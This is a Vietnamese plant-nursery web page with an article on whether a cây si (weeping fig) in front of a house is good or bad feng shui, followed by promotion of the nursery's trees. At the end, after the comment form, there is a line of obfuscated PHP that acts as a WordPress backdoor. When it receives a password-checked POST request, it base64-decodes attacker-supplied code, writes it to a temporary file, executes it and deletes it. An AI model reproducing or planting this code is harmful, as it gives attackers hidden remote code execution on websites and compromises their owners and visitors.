Theo phong thuỷ, trồng cây si trước nhà có tốt không?

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Trồng cây cảnh là thú vui của nhiều người dân Việt Nam. Đây là một thú vui vừa tao nhã vừa có ích cho môi trường, đem lại không khí trong lành cho nơi bạn sống. Tuy nhiên không phải cây nào cũng trồng được và có những cây theo phong thuỷ là không tốt. Trồng cây si trước nhà có tốt không là một thắc mắc của nhiều người thích trồng cây, Vuoncayhoabinh.com sẽ đem đến cho bạn một đáp án cho câu hỏi đó.

Theo phong thuỷ, trồng cây si trước nhà có tốt không?
Theo phong thuỷ, trồng cây si trước nhà có tốt không?

Tổng quan về phong thuỷ

Phong thủy là gì?

Trước khi trả lời câu hỏi trên, ta cần phải biết phong thuỷ là gì? Đây là từ mà hẳn ai cũng đều đã từng được nghe qua. Nhưng thật sự khái niệm cụ thể của nó thì không phải ai cũng biết.

 

Phong thuỷ thường được người ta nhắc đến trong việc xây nhà, dựng móng, trong việc mua đất, thiết nhà,.. Người ta thường nói là phải làm sao cho hợp phong thuỷ, để gia chủ được làm ăn phát đạt, gặp may mắn.

 

Phong thuỷ có khởi nguồn từ Trung Quốc cổ đại, từ 4000 năm trước, tương truyền là do Hiên Viên Hoàng Đế tạo ra. Phong chính là gió, thuỷ là nước. Phong thuỷ chính là những nghiên cứu về những ảnh hưởng của hướng gió và mạch nước đến con người.

 

Phong thủy hiện nay

 

Những kiến thức đó đã đi sâu vào trong đời sống của con người và trở thành một quan niệm bất di bất dịch trong cuộc sống thường ngày. Dù có tin hay không tin thì khi mua đất làm nhà, hay khi xây nhà, dựng móng đều sẽ đi tìm thầy để hỏi về phong thuỷ. Đều sẽ hỏi hướng đó có tốt không, có hại gì không.

 

Không chỉ mỗi hướng, mà ngay cả việc chọn cây cảnh và vị trí trồng cây cảnh ở nhà cũng rất ảnh hưởng đến phong thuỷ.

 

Giới thiệu về cây si

 

Cây si là một trong những cây cảnh phổ biến ở Việt Nam, thường được trồng ở rất nhiều nơi như trường học, bệnh viện, hay sân vườn,… Si là loại cây có rất nhiều rễ phụ mọc từ cành cây và rủ xuống đất nên rất thích hợp làm cây bon sai.

Theo phong thuỷ, trồng cây si trước nhà có tốt không?
Theo phong thuỷ, trồng cây si trước nhà có tốt không?

Đây là một trong những loại cây dễ trồng nhất, chỉ cần cầm một nhánh cây, cắm xuống đất, như vậy là đã đủ để cây sống tiếp. Thậm chí, nó dễ sống đến mức dù bạn có cắt một cành cây ngâm vào trong nước thì cành cây đó vẫn sẽ sống.

 

Người ta thường trồng cây si trên những bể cá cảnh bởi khả năng sống trong môi trường rễ ngập nước và khả năng bám vào đá đều rất tốt. Sau khi trồng một thời gian, cây si sẽ có một bộ rễ phủ kín, tạo ra những tư thế rất đẹp. Bộ rễ đẹp và đặc biệt như vậy nên đây là một trong những loại cây cảnh được yêu thích nhất tại gia hiện nay.

Mối liên quan giữa cây si và phong thuỷ

Quan niệm cây si thuộc nhóm ngũ quỷ

Trong kinh nghiệm phong thuỷ, có một số loại cây cảnh thuộc nhóm ngũ quỷ tuyệt đối không nên trồng ngay trước cửa nhà, đó là: Hoè, liễu, gạo, đa và si. Đây là những cây cảnh mang tính âm rất nặng, nếu trồng trước cửa sẽ dẫn ma quỷ đến trú ngụ, là những cây thuộc về đất âm. Ông cha ta cũng đá có câu về việc này “Trong nhà có sân, chớ trồng ngũ quỷ” chính là nói về việc không nên trồng 5 loại cây trên ở sân nhà.

Cây si thuộc nhóm tứ linh

 

Tuy nhiên, cũng có không ít ý kiến trái chiều ngược với quan điểm trên. Có không ít người cho rằng, cũng theo phong thuỷ, cây si thuộc nhóm tứ linh, là những cây sẽ mang lại đại cát đại lợi cho gia chủ, đếm đến phúc khí cho cả nhà. Nếu trồng cây si cả nhà sẽ gặp những điều may mắn, tốt lành.

Trồng cây si trước nhà có tốt không?
Trồng cây si trước nhà có tốt không?

Không chỉ vậy, si là loại cây trồng càng lâu năm thế tạo ra càng đẹp, là lựa chọn vô cùng hoàn hảo với những người thích trồng cây bon sai. Hơn thế, si rất mềm, dễ uốn nắn từ nhỏ. Người chơi cảnh có thể dễ dàng uốn nắn, tạo hình cho cây si thành những dáng, tư thế đẹp theo ý muốn, đợi đến khi nó lớn lên rễ rủ xuống sẽ vô cùng đẹp.

 

Nếu đặt đúng vị trí, cây si sẽ còn mang đến sinh khí cho gia chủ, tăng thêm phúc lộc. Nhiều người am hiểu về phong thuỷ còn biết tính toán sao cho đặt cây si ở những vị trí trọng yếu có phong thuỷ xấu, đem lại sát khí cho ngôi nhà để cây có thể trấn yểm nó, khiến mảnh đất trở nên tốt hơn.

Nên trồng cây si trước nhà hay không?

 

Như những gì đã viết ở trên, việc có nên trồng một cây si ở trước nhà không cần phụ thuộc vào nhiều yếu tố. Không nên chỉ nhìn vào điểm ‘không tốt’ của cây mà quyết định không trồng một loại cây đẹp và đem lại nhiều may mắn như cây si.

Trồng cây si trước nhà có tốt không?
Trồng cây si trước nhà có tốt không?

Nếu nhà bạn đang trồng sẵn một cây si, cần cân nhắc thật kỹ trước khi quyết định chặt bỏ nó. Đừng chỉ nhìn vào một vấn đề, tốt nhất là phải xét nó trong một mối tương quan với hướng nhà, tuổi của gia chủ, vị trí tương đối của ngôi nhà,… Như vậy mới có thể tìm được vị trí đẹp nhất để trồng cây si.

 

Si là một cây cảnh đẹp, tuy nhiên không ít người non tay mà phạm phải nhiều điều cố kỵ trong phong thuỷ. Hy vọng sau khi đọc bài viết trên, bạn sẽ có những cân nhắc đúng đắn trong việc có nên trồng một cây si trước nhà không

 

Hiện nay, trên thị trường có rất nhiều cơ sở bán cây si khác nhau, trong đó không thể không kể đến đó là Vườn cây Hòa Bình. Với nhiều năm kinh doanh cây công trình, cây xanh đô thị, cây phong thủy,…chúng tôi tin có thể mang đến cho bạn những dòng cây với chất lượng tốt nhất.

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}